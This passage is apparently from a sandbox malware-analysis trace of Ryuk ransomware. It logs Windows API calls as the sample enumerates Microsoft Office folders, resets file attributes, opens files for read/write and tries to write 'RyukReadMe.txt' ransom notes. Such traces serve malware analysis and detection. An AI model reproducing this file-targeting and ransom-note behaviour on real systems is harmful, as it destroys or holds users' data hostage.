FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.692] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG", dwFileAttributes=0x80) returned 0 [0136.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\english.lng"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.693] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.693] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.693] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.693] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.693] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.693] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD", dwFileAttributes=0x80) returned 0 [0136.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.698] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.699] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.699] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.699] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.699] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.699] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML", dwFileAttributes=0x80) returned 0 [0136.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\exlirm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.699] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.699] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML", dwFileAttributes=0x80) returned 0 [0136.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\exlirmv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.700] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.700] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.700] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.700] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.700] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.700] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.700] SetLastError (dwErrCode=0x0) [0136.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.701] GetLastError () returned 0x5 [0136.701] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.701] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.701] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.701] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.701] SetLastError (dwErrCode=0x0) [0136.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.701] GetLastError () returned 0x5 [0136.701] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.701] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.702] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.703] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO", dwFileAttributes=0x80) returned 0 [0136.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.704] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.704] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.704] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO", dwFileAttributes=0x80) returned 0 [0136.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.704] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.704] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.705] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.705] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG", dwFileAttributes=0x80) returned 0 [0136.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.705] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.705] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.705] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.705] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG", dwFileAttributes=0x80) returned 0 [0136.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.706] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.706] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.706] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.706] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO", dwFileAttributes=0x80) returned 0 [0136.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.707] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.707] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO", dwFileAttributes=0x80) returned 0 [0136.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.707] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.707] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG", dwFileAttributes=0x80) returned 0 [0136.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.708] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.708] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.708] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.708] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO", dwFileAttributes=0x80) returned 0 [0136.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.708] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.708] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.709] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG", dwFileAttributes=0x80) returned 0 [0136.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.710] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO", dwFileAttributes=0x80) returned 0 [0136.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.710] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG", dwFileAttributes=0x80) returned 0 [0136.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.711] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.711] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.711] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO", dwFileAttributes=0x80) returned 0 [0136.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.711] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.711] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.711] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO", dwFileAttributes=0x80) returned 0 [0136.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.713] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.713] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG", dwFileAttributes=0x80) returned 0 [0136.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.714] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.714] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.714] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.714] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO", dwFileAttributes=0x80) returned 0 [0136.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.715] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO", dwFileAttributes=0x80) returned 0 [0136.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.716] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG", dwFileAttributes=0x80) returned 0 [0136.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.716] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.716] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO", dwFileAttributes=0x80) returned 0 [0136.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.718] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO", dwFileAttributes=0x80) returned 0 [0136.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.719] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG", dwFileAttributes=0x80) returned 0 [0136.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.719] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO", dwFileAttributes=0x80) returned 0 [0136.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.720] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.720] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO", dwFileAttributes=0x80) returned 0 [0136.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 